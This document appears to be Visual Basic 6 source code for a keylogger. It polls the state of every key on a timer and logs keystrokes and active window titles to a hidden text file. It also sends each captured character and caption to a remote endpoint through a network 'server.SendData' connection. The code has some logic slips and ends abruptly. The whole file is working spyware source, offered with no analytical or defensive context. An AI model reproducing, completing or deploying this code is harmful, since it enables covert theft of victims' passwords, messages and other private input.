Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Dim mastervariable As String
Dim returnvalue As String
Dim previousvalue As String
'create a directory for a keyboard stroke
Private Sub Form_Load()
On Error Resume Next
End Sub
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Open "C:\WINDOW\IO.TXT" For Append As #1
Print #1, Text1.text
Close #1
End Sub
'view a title bar caption
'all !!!!
Private Sub Label8_Click()
Text2.Visible = True
Text2.text = mastervariable
End Sub
'mouse hover
Private Sub Label8_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
Label8.BackColor = vbRed
End Sub
Private Sub Timer1_Timer()
'if the directory remove
' program can create a new directory
'MsgBox keyascii
Dim i As KeyCodeConstants
On Error Resume Next
On Error Resume Next
For i = 32 To 256
X = GetAsyncKeyState(i)
If X = -32767 Then
'MsgBox vbkeypress
'MsgBox i
'Exit Sub
If Chr(i) >= 0 And Chr(i) <= 9 Then
Text1.ForeColor = vbRed
Text1.text = Text1.text + Chr(i)
On Error Resume Next
Form1.server.SendData Chr(i)
ElseIf i = 38 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 40 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 37 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 39 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 46 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 45 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 33 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 34 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 36 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 35 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 112 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 113 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 114 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 115 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 116 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 117 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 118 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 119 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 120 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 121 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 122 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 123 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 44 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 145 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text
ElseIf i = 190 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "."
On Error Resume Next
Form1.server.SendData "."
ElseIf i = 188 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & ","
On Error Resume Next
Form1.server.SendData ","
ElseIf i = 189 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "-"
On Error Resume Next
Form1.server.SendData "-"
ElseIf i = 190 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "_"
On Error Resume Next
Form1.server.SendData "_"
ElseIf i = 186 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & ";"
On Error Resume Next
Form1.server.SendData ";"
ElseIf i = 221 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "]"
On Error Resume Next
Form1.server.SendData "]"
ElseIf i = 219 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "["
On Error Resume Next
Form1.server.SendData "["
ElseIf i = 220 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "\"
On Error Resume Next
Form1.server.SendData "\"
ElseIf i = 187 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "="
On Error Resume Next
Form1.server.SendData "="
ElseIf i = 192 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "`"
On Error Resume Next
Form1.server.SendData "`"
ElseIf i = 96 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "0"
On Error Resume Next
Form1.server.SendData "0"
ElseIf i = 97 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "1"
On Error Resume Next
Form1.server.SendData "1"
ElseIf i = 98 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "2"
On Error Resume Next
Form1.server.SendData "2"
ElseIf i = 99 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "3"
On Error Resume Next
Form1.server.SendData "3"
ElseIf i = 100 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "4"
On Error Resume Next
Form1.server.SendData "4"
ElseIf i = 101 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "5"
On Error Resume Next
Form1.server.SendData "5"
ElseIf i = 102 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "6"
On Error Resume Next
Form1.server.SendData "6"
ElseIf i = 103 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "7"
On Error Resume Next
Form1.server.SendData "7"
ElseIf i = 104 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "8"
On Error Resume Next
Form1.server.SendData "8"
ElseIf i = 105 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "9"
On Error Resume Next
Form1.server.SendData "9"
ElseIf i = 106 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "*"
On Error Resume Next
Form1.server.SendData "*"
ElseIf i = 107 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "+"
On Error Resume Next
Form1.server.SendData "+"
ElseIf i = 109 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "-"
On Error Resume Next
Form1.server.SendData "-"
ElseIf i = 110 Then
Text1.ForeColor = &HFF00&
Text1.text = Text1.text & "."
On Error Resume Next
Form1.server.SendData "."
Text1.ForeColor = &HFF00&
Text1.text = Text1.text + Chr(i)
On Error Resume Next
Form1.server.SendData Chr(i)
End If
End If
returnvalue = GetCaption(GetForegroundWindow)
mastervariable = returnvalue
If returnvalue = previousvalue Then
previousvalue = returnvalue
previousvalue = returnvalue
Text1.text = Text1.text & vbCrLf & returnvalue
End If
End Sub
Private Sub Timer2_Timer()
'mastervariable = mastervariable & Text1.text
On Error Resume Next
Form1.server.SendData mastervariable
'mastervariable = mastervariable & Text1.text
'save the contents to a file called keysom in c drive
'u can open the keysom .. by opening it with notepad